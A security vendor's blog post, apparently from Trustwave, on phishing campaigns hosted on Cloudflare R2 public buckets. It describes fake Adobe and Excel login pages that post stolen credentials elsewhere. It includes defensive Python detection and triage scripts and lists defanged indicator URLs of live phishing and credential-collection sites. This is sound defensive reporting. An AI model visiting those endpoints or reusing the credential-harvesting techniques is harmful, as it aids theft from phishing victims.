A Bucket of Phish: Attackers Shift Tactics with Cloudflare R2 Public Buckets

In our previous blog, we found many phishing and scam URLs abusing Cloudflare services through the pages.dev and workers.dev domains. We are now seeing many phishing emails with URLs abusing another Cloudflare service, r2.dev.


What is Cloudflare R2?

Cloudflare R2 is a relatively new cloud storage service that allows developers to store large amounts of unstructured data without the costly egress bandwidth fees associated with typical cloud storage services.


Public Buckets on R2

Like AWS S3 and other cloud storage services, Cloudflare R2 offers public buckets, a feature that allows users to expose the contents of their R2 buckets directly to the Internet. By default, buckets are not publicly accessible; public access must be explicitly enabled by the bucket owner.

These public buckets are now being abused in a variety of phishing attacks and are widely seen in URLs used in phishing emails. The common URL structure is https://pub-{32 Hexadecimal String}.r2.dev/.
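Because the public-bucket hostname has such a fixed shape, it is easy to flag in mail logs. The following is an added example written for this post, not code from Trustwave or Cloudflare: it matches the pub-&lt;32 hex&gt;.r2.dev pattern described above, accepts both raw and defanged (hxxps://, [.]) forms so it can also be run over IOC lists, and returns the bucket label and path for each hit. The log lines and bucket identifiers are constructed for the example, not real telemetry.

```python
import re
from typing import Dict, Iterable, Iterator, List, Tuple

# Public R2 bucket hostnames follow pub-<32 hex chars>.r2.dev (per the post).
# The pattern also accepts the defanged forms used in threat reports
# (hxxps://, [.]) so the same check works on mail logs and on IOC lists.
R2_PUBLIC_BUCKET_RE = re.compile(
    r"""
    \b(?:h[tx]{2}ps?)://                 # http(s) or defanged hxxp(s)
    (pub-[0-9a-f]{32})                   # bucket host label: exactly 32 hex chars
    (?:\.|\[\.\])r2(?:\.|\[\.\])dev      # .r2.dev, possibly written as [.]r2[.]dev
    (/[^\s"'<>]*)?                       # optional path, stops at whitespace/quotes
    """,
    re.IGNORECASE | re.VERBOSE,
)


def refang(text: str) -> str:
    """Turn a defanged URL or path (hxxps://, [.]) back into its normal form."""
    return re.sub(r"^h[tx]{2}p", "http", text, flags=re.IGNORECASE).replace("[.]", ".")


def find_r2_public_urls(text: str) -> List[Dict[str, str]]:
    """Return every public-bucket R2 URL in text with its bucket label and path."""
    hits = []
    for m in R2_PUBLIC_BUCKET_RE.finditer(text):
        hits.append({
            "url": refang(m.group(0)),
            "bucket": m.group(1).lower(),
            "path": refang(m.group(2)) if m.group(2) else "/",
        })
    return hits


def scan_mail_log(lines: Iterable[str]) -> Iterator[Tuple[int, Dict[str, str]]]:
    """Yield (line_number, hit) for each log line carrying an R2 public-bucket URL."""
    for n, line in enumerate(lines, 1):
        for hit in find_r2_public_urls(line):
            yield n, hit


# Constructed sample mail-gateway log lines (hypothetical bucket ids and addresses).
SAMPLE_LOG = [
    '2024-02-01T09:12:03Z subj="Statement Paid" url=hxxps://pub-0123456789abcdef0123456789abcdef[.]r2[.]dev/indexR[.]html',
    '2024-02-01T09:15:44Z subj="Weekly report" url=https://developers.cloudflare.com/r2/',
    '2024-02-01T09:20:10Z subj="Purchase Order" url=https://pub-abcdef0123456789abcdef0123456789.r2.dev/index.html?user@example.invalid',
    '2024-02-01T09:21:00Z subj="Hi" url=https://pub-deadbeef.r2.dev/short.html',
]

if __name__ == "__main__":
    for line_no, hit in scan_mail_log(SAMPLE_LOG):
        print(f"line {line_no}: bucket={hit['bucket']} path={hit['path']} url={hit['url']}")
```

The fourth sample line is deliberately not matched: its label is not 32 hex characters, so the check only fires on the public-bucket shape the post describes rather than on every r2.dev reference.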


Phishing Emails Using Cloudflare R2 URLs

Over the past 60 days, we have seen more than 2,000 phishing emails containing URLs that abuse the r2.dev service. The subjects of these emails use alarming or common keywords such as "statement paid", "upgrade mail", "purchase order", etc.

This phishing email sample imitates Adobe Acrobat in its From header, although the sender address does not belong to a legitimate Adobe Acrobat domain and appears to be auto-generated. It also uses "Statement Paid" in the subject to lure the victim into opening the email:

Figure 1. The email header of the phishing email imitating Adobe Acrobat

Figure 1.2. The phishing email showing an approved payment

The clickable link hxxps://pub-5e34bcda437b499399d6abc116886480[.]r2[.]dev/indexR[.]html in the phishing email leads to a phishing site that imitates Adobe:

Figure 2. Screenshot of the fake Adobe site

Looking deeper into the source code of the phishing page, we can see that the victim's credentials are posted to another phishing URL via an Ajax request:

Figure 2.1. The source code containing another phishing URL that points to a PHP file

Another phishing email sample we found contains the subject keywords ‘purchase order’ and an image attachment of a fake purchase order:

Figure 3. The email header of the phishing email pretending to be related to a purchase order

Figure 3.1. The email with a PNG attachment of the fake purchase order

The PNG file attached to the phishing email is very small, which makes it hard to zoom in, and the list of purchased items is not clear.

There’s also a phishing URL using the r2.dev domain hxxps://pub-3f02c99abcf44a4b92babb3b3c5356d6[.]r2[.]dev/index[.]html?xxx@xxxxxxx.xxx that leads to a fake Microsoft Excel spreadsheet log-in page.

Figure 4. The phishing site imitating Microsoft Excel

The source code of this phishing page uses the JavaScript atob method to decode a base64-encoded string that holds the redirection URL where the stolen credentials will be posted.

Figure 4.1. The source code containing the base64-encoded string

Decoding the base64 string reveals a phishing URL hosted on a SharePoint site, hxxps://regionalmanagers-my[.]sharepoint[.]com/:b:/p/ivan/EVhCMbG-roNHisHIx3fXqXkBATy7wZKPXYQsdKYIS5rgWA?e=1XABKN/, whose path contains what appears to be the name of the SharePoint account owner.
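Both kits described above (the Adobe page posting credentials via Ajax to a PHP file, and the Excel page hiding its onward URL behind atob) can be triaged the same way once the page source has been captured. The following is an added example written for this post, not code from the post's authors: it pulls the POST targets out of $.ajax calls and form actions, keeps those on a host other than the bucket itself, and decodes every base64 literal passed to atob. The sample page, its hostnames and the base64 string are constructed for the example; the real URLs are listed in the IOCs section.

```python
import base64
import binascii
import re
from typing import Dict, List
from urllib.parse import urlparse

# atob("...") / atob('...') with a base64 literal as the argument.
ATOB_RE = re.compile(r"""atob\(\s*(["'])([A-Za-z0-9+/=]+)\1\s*\)""")
# url: "..." inside a jQuery $.ajax({...}) call.
AJAX_URL_RE = re.compile(r"""\burl\s*:\s*(["'])(https?://[^"']+)\1""", re.IGNORECASE)
# action="..." on a <form> element.
FORM_ACTION_RE = re.compile(r"""<form\b[^>]*\baction\s*=\s*(["'])([^"']+)\1""", re.IGNORECASE)


def decode_atob_literals(html: str) -> List[str]:
    """Decode every base64 literal passed to atob() in the page; skip invalid ones."""
    decoded = []
    for _, literal in ATOB_RE.findall(html):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64 or not text: leave it for manual review
    return decoded


def external_post_targets(html: str, page_host: str) -> List[str]:
    """URLs the page submits data to that live on a host other than the page itself."""
    targets = [u for _, u in AJAX_URL_RE.findall(html)]
    targets += [a for _, a in FORM_ACTION_RE.findall(html)]
    external = []
    for target in targets:
        host = urlparse(target).hostname
        if host and host.lower() != page_host.lower():
            external.append(target)
    return external


def triage_page(html: str, page_host: str) -> Dict[str, List[str]]:
    """Summarise where a captured phishing page sends data and what it hides in base64."""
    decoded = decode_atob_literals(html)
    return {
        "post_targets": external_post_targets(html, page_host),
        "decoded_atob": decoded,
        "decoded_urls": [d for d in decoded if d.lower().startswith(("http://", "https://"))],
    }


# Constructed sample page modelled on the two kits described in the post.
# Hostnames are placeholders; the base64 literal decodes to a placeholder URL.
SAMPLE_PAGE_HOST = "pub-0123456789abcdef0123456789abcdef.r2.dev"
SAMPLE_PAGE = """
<form id="login"><input name="email"><input name="passwd" type="password"></form>
<script>
$.ajax({ type: "POST", url: "https://example.invalid/wp-content/uploads/app.php",
         data: $("#login").serialize() });
var next = atob("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvcmVkaXJlY3QuaHRtbA==");
window.location.href = next;
</script>
"""

if __name__ == "__main__":
    for key, values in triage_page(SAMPLE_PAGE, SAMPLE_PAGE_HOST).items():
        print(f"{key}: {values}")
```

The decoded URLs and post targets are the values worth adding to blocklists and click-time scanning rules, since the bucket URL in the email is only the first hop.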


Cloudflare R2 Phishing URLs in VirusTotal

Over the past 60 days, we also observed more than 25,000 phishing r2.dev URLs in our VirusTotal telemetry, many of which have multiple vendor detections, as shown by the count in the positives column.

Figure 5. Screenshot of the Cloudflare R2 URLs seen in VirusTotal for the last 60 days

Figure 5.1. Different Cloudflare R2 phishing URLs seen in VirusTotal

Conclusion

Nowadays, cloud storage services are widely used, especially for file backups or for maintaining large databases. However, cloud services are also being abused, and we need to be very careful with r2.dev links seen in emails, specifically the public-bucket URLs whose hostnames start with https://pub- and end with r2.dev, as they are being used in phishing attacks. Being alert and staying updated with security news are the best ways to avoid becoming a victim of phishing attacks and getting caught up in a bucket of phish.

Trustwave MailMarshal protects against these phishing email campaigns, including through click-time scanning of the URLs.


IOCs

URLs

hxxps://pub-5e34bcda437b499399d6abc116886480[.]r2[.]dev/indexR[.]html

hxxps://samtravelsandtours[.]com/wp-content/uploads/elementor/css/app[.]php

hxxps://pub-3f02c99abcf44a4b92babb3b3c5356d6[.]r2[.]dev/index[.]html?xxx@xxxxxxx.xxx

hxxps://regionalmanagers-my[.]sharepoint[.]com/:b:/p/ivan/EVhCMbG-roNHisHIx3fXqXkBATy7wZKPXYQsdKYIS5rgWA?e=1XABKN/

hxxps://1-d0asfasfjhasfa7979352jhasf[.]pages[.]dev/

hxxps://pub-632c9814b1e848d1a7a36091da6c2082[.]r2[.]dev/index[.]html

hxxps://pub-87c999dfbd87410f8077dc99997234be[.]r2[.]dev/fiv[.]html

References:

https://developers.cloudflare.com/r2/

https://developers.cloudflare.com/r2/buckets/public-buckets/
